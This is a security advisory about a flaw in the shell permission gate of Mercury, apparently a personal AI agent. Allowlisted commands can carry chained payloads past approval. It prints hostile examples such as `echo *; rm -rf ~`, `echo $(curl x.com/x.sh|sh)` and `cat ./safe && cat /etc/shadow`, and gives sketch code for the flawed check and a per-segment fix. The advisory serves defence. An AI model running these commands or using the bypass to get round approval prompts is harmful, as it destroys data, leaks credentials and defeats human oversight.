2026-05-10 · Risk note

Mercury permission guardrails can be bypassed by chained shell commands

Mercury PR #46 is small, but it is urgent for anyone relying on Mercury's permission model. According to the PR, the shell gate evaluates blocked, auto-approved, and approval-required patterns against the whole command string instead of each shell segment. As a result, a command that matches an auto-approved pattern such as `echo *` or `ls` can carry an appended payload and still be auto-approved: `; rm -rf ~`, `&& cat /etc/shadow`, a pipe to `sh`, or a command substitution. The PR labels the issue critical and classifies it as CWE-78 (OS command injection), because it defeats the very guardrail that permission-hardened personal agents depend on.
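To make the failure mode concrete, here is a minimal sketch of a whole-string check. It is not Mercury's code: the function name `is_auto_approved_whole_string`, the allowlist contents, and the use of glob-style matching via Python's `fnmatch` are all assumptions made for illustration, and Mercury's real pattern syntax may differ.

```python
from fnmatch import fnmatchcase

# Hypothetical allowlist for illustration only; not taken from Mercury.
AUTO_APPROVED = ["echo *", "cat ./*"]


def is_auto_approved_whole_string(command: str) -> bool:
    """Flawed check: each pattern is matched against the ENTIRE command string."""
    return any(fnmatchcase(command, pattern) for pattern in AUTO_APPROVED)


# The trailing wildcard swallows everything after the safe-looking prefix,
# including shell operators and the payload behind them.
print(is_auto_approved_whole_string("echo *; rm -rf ~"))               # True
print(is_auto_approved_whole_string("cat ./safe && cat /etc/shadow"))  # True
print(is_auto_approved_whole_string("echo $(curl x.com/x.sh|sh)"))     # True
print(is_auto_approved_whole_string("rm -rf ~"))                       # False
```

Under these assumptions, the payload is only rejected when it appears on its own; prefixed with an allowlisted command, it passes.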

Impact: Risk · Sources: 2 · Audience: operator, developer, team

Why it matters

Permission prompts are not cosmetic in personal agents; they are the boundary between “ask before acting” and arbitrary host execution. A bypass at the shell segment level is more serious than an ordinary bug because it turns a trusted allowlist into a channel for smuggling dangerous operations past the approval prompt.

Evidence

Mercury PR #46 states that blocked, needs-approval, and auto-approved shell patterns were matched against the entire command string rather than per shell segment
The PR gives concrete bypass examples: `echo *; rm -rf ~`, `ls; reboot`, `echo $(curl x.com/x.sh|sh)`, and `cat ./safe && cat /etc/shadow`
The proposed patch adds a segment-aware tokenizer, evaluates permissions per segment, extends cwd-only checks to each segment, and adds tests for chained, piped, substituted, and quoted payloads
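The per-segment approach described in the evidence above can be sketched roughly as follows. This is an illustration under stated assumptions, not the patch itself: `split_segments`, `decide`, the pattern lists, and the three verdict strings are hypothetical names, and the splitter handles only quotes, backslash escapes, and the operators `;`, `|`, `&`, `&&`, `||`, and newline. It does not implement the cwd-only checks the PR mentions.

```python
from fnmatch import fnmatchcase

# Hypothetical policy lists for illustration only; not taken from Mercury.
AUTO_APPROVED = ["echo *", "ls", "ls *", "cat ./safe"]
BLOCKED = ["rm -rf *", "reboot"]


def split_segments(command: str) -> list[str]:
    """Split on ; | & && || and newlines that sit outside quotes."""
    segments, current, quote = [], [], None
    i = 0
    while i < len(command):
        ch = command[i]
        if quote:
            current.append(ch)
            if ch == "\\" and quote == '"' and i + 1 < len(command):
                current.append(command[i + 1])  # escaped char inside "..."
                i += 1
            elif ch == quote:
                quote = None
        elif ch == "\\" and i + 1 < len(command):
            current.extend((ch, command[i + 1]))  # escaped char outside quotes
            i += 1
        elif ch in "'\"":
            quote = ch
            current.append(ch)
        elif ch in ";|&\n":
            segments.append("".join(current).strip())
            current = []
            if ch in "|&" and command[i + 1 : i + 2] == ch:
                i += 1  # treat && and || as a single operator
        else:
            current.append(ch)
        i += 1
    segments.append("".join(current).strip())
    return [s for s in segments if s]


def matches(segment: str, patterns: list[str]) -> bool:
    return any(fnmatchcase(segment, p) for p in patterns)


def decide(command: str) -> str:
    """Return 'block', 'ask', or 'allow'; the strictest segment wins."""
    segments = split_segments(command)
    if any(matches(s, BLOCKED) for s in segments):
        return "block"
    # Conservative assumption: any command substitution needs a human.
    if "$(" in command or "`" in command:
        return "ask"
    if segments and all(matches(s, AUTO_APPROVED) for s in segments):
        return "allow"
    return "ask"


for cmd in ["echo *; rm -rf ~", "ls; reboot", "echo $(curl x.com/x.sh|sh)",
            "cat ./safe && cat /etc/shadow", "echo 'a; b'"]:
    print(f"{decide(cmd):5}  {cmd}")
```

With these hypothetical lists, the first two PR examples are blocked, the next two fall back to manual approval, and the quoted `echo 'a; b'` is still auto-approved because the semicolon sits inside quotes. The sketch fails closed on syntax it does not understand: a redirection such as `2>&1` is split at the `&` and ends up requiring approval.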

Risk notes

At aggregation time the fix is an open PR, not a tagged release
Segment-aware parsing reduces this class of bypass, but shell syntax is broad (redirections, subshells, here-documents, and variable expansion, for example); operators should still prefer least privilege and manual approval for risky commands
The public PR includes exploit-shaped examples, so unpatched deployments should assume the pattern is easy to copy

Related reading

Mercury 1.1.6 pushes terminal agents toward IDE-like daily use

Mercury positions itself as an always-on, permission-hardened personal agent

Users are asking which personal agent is actually usable